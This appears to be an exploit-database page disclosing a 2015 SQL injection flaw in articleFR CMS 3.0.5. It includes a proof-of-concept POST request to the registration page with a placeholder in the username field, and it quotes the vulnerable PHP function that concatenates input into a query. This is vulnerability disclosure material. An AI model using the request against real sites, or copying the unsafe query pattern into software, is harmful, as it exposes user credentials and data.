header-logo
Suggest Exploit
vendor:
articleFR CMS
by:
Tran Dinh Tien & ITAS Team
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: articleFR CMS
Affected Version From: 3.0.5
Affected Version To: 3.0.5
Patch Exists: NO
Related CWE: N/A
CPE: a:articlefr:articlefr_cms:3.0.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

SQL injection vulnerability in articleFR CMS 3.0.5

A SQL injection vulnerability exists in articleFR CMS 3.0.5. An attacker can send a specially crafted HTTP POST request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. The vulnerable code is located in the file articleFR/system/profile.functions.php and the vulnerable parameter is username. The vulnerable query is SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username ='[Injection HERE]'. The vulnerable function is getProfile($_username, $_connection).

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being passed to the database. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: SQL injection vulnerability in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5 
# Tested on: Linux
# CVE : N/A

::PROOF OF CONCEPT::

- REQUEST:

POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/articlefr/register/
Cookie: _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4; PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

username=[SQL INJECTION HERE]&email=test2%40itas.vn&name=test&password=123123&submit=register

- Vulnerable file: articleFR/system/profile.functions.php
- Vulnerable parameter: username
- Query: SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username ='[Injection HERE]'
- Vulnerable function:
function getProfile($_username, $_connection) {
$_q = "SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username = '" . $_username . "'";
$_result = single_resulti($_q, $_connection);

$_retval['id'] = $_result['id'];
$_retval['name'] = $_result['name'];
$_retval['username'] = $_result['username'];
$_retval['password'] = $_result['password'];
$_retval['email'] = $_result['email'];
$_retval['website'] = $_result['website'];
$_retval['blog'] = $_result['blog'];
$_retval['date'] = $_result['date'];
$_retval['isactive'] = $_result['isactive'];
$_retval['activekey'] = $_result['activekey'];
$_retval['membership'] = $_result['membership'];

return $_retval;
}

Navigation

Suggest Exploit

Services By CQR